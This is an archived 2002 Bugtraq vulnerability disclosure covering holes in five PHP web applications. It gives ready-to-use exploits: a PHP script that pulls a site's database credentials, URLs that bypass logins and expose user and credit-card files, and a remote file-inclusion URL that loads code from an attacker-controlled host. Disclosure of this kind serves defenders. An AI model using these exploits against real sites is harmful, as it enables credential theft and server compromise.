Multiple Web Security Holes

From: Frog Man (leseulfrog@hotmail.com)
Date: 10/02/02 

From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Wed, 02 Oct 2002 19:22:15 +0200

I sent this three times to webappsec but without resultats.
I try so on bugtraq, although that is less appropriate.

-----------------------------------------------------
Five products in PHP are vulnerable to various holes.

1) TightAuction
Website : http://www.tightprices.com
Tested Version : 3.0
Problem : BD informations disclosure
Exploit :
<?
$victime="http://[target]";
include("$victime/config.inc");
print("Infos de la DataBase du site $victime : \n \n");
print("Login : $DB_Username \nPassword : $DB_Password \nServer :
$DB_Database");
?>

2) PY-Membres
Website : http://py-scripts.levillage.org/
Tested Version : 3.1
Problem : Access to all accounts
Exploit :
http://[target]/index.php?pymembs=admin
http://[target]/index.php?pymembs=[USER]

Problem :
<?
if ($pymembs)
{
$login=$pymembs;
session_start();
session_register('login');
}
else { session_start(); }
[...]
if(!session_is_registered('login'))
{
?>
[...]

3) upb PB
Website : http://www.webrc.ca/
Tested Version : 1.0b
Problem : Informations disclosure
Exploit :
http://[target]/db/users.dat

4) MidiCart PHP
Website : http://www.midicart.com
Version : 1
Problems : Informations disclosure, Upload
Exploit :
http://{target}/admin/credit_card_info.php
http://{target}/admin/upload.php

5) Pphlogger
Website : http://www.phpee.com
Tested Versions : 2.0.9, 2.2.1, 2.2.2a
Problem : Include file
Exploit :
http://[target]/showhits.php3?rel_path=http://[attacker]
with
http://[attacker]/main_location.inc
or
http://[attacker]/config.inc.php3
or
http://[attacker]/get_userdata.php3

Problem :
if (!isset($rel_path)) $rel_path="";
include $rel_path."config.inc.php3";
include $rel_path."get_userdata.php3";

For more details & patchs :
In french :
http://www.frog-man.org/tutos/5holes10.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes10.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII

-----------------------------------------------------

Sorry for my poor english.
frog-m@n

_________________________________________________________________
Discutez en ligne avec vos amis ! http://messenger.msn.fr

Relevant Pages

  • Re: Web Animation and Sound Advice Sought
    ... upon someone landing on my website, ... My blog program is a php program that makes use of a mysql database. ... linux (and the linux server supports all sorts of php). ... $500+ Premiere software -- at least on my first brief experimenting ...
    (misc.writing)
  • Re: Furthering my education in OOP - where/how can one learn professional skills?
    ... but I am not proud of the rather amateurish ... implement them in a website. ... is PHP the best language to use to learn and implement the full ... power of OOP? ...
    (comp.lang.php)
  • Re: Best (most Borland-like) PHP IDE+Debugger?
    ... existed before Borland quit trying to compete with M$'s VisualC. ... Is there anything like it for PHP? ... But it has no debugging capability. ... Manuel's ONLY answers to questions are to see something on his website - and he never identifies it as his website. ...
    (comp.lang.php)
  • Re: Got Delphi for PHP - first impressions
    ... Having exactly Delphi and PHP as my two main developer platforms, ... Delphi for PHP sounded at first as a something sent from heaven. ... It looks more like normal Windows apps. ... full fledged websites, having the look and feel as a website. ...
    (borland.public.delphi.non-technical)
  • Re: [PHP] Evaluating a page in a different order
    ... I have a php page class that i use as a template for my website. ... The class includes the layout from ...
    (php.general)